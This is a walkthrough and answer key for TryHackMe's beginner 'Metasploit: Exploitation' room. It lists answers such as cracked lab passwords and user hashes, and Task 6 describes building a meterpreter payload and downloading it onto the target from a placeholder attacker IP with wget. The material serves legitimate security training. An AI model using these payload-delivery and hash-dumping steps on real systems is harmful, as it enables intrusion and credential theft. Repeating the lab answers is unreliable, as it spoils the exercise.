THM | Metasploit: Exploitation
Summary:
This series of walkthroughs aims to help complete beginners finish the Complete Beginner path on the TryHackMe website. It is based on the learning content provided in the Metasploit: Exploitation room.
Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance.
Task | 1 | Introduction
Question 1: Start the AttackBox and run Metasploit using the msfconsole command to follow along this room.
No answer needed
Task | 2 | Scanning
Question 1: How many ports are open on the target system?
5
Question 2: Using the relevant scanner, what NetBIOS name can you see?
ACME IT SUPPORT
Question 3: What is running on port 8000?
webfs/1.21
Question 4: What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.
leo1234
Task | 3 | The Metasploit Database
Question 1: No answer needed
No answer needed
Task | 4 | Vulnerability Scanning
Question 1: Who wrote the module that allows us to check SMTP servers for open relay?
Campbell Murray
Task | 5 | Exploitation
Question 1: Exploit one of the critical vulnerabilities on the target VM
No answer needed
Question 2: What is the content of the flag.txt file?
<flag>
Question 3: What is the NTLM hash of the password of the user "pirate"?
8ce9a3ebd1647fcc5e04025019f4b875
Task | 6 | Msfvenom
Question 1: Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type sudo su to get a root shell, this will make things easier.
No answer needed
Question 2: Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
No answer needed
Question 3: Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://<ATTACKING_MACHINE_IP>:9000/shell.elf to download it to the target machine).
No answer needed
Question 4: Get a meterpreter session on the target machine.
No answer needed
Question 5: Use a post exploitation module to dump hashes of other users on the system.
No answer needed
Question 6: What is the other user's password hash?
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
Task | 7 | Summary
Question 1: No answer needed
No answer needed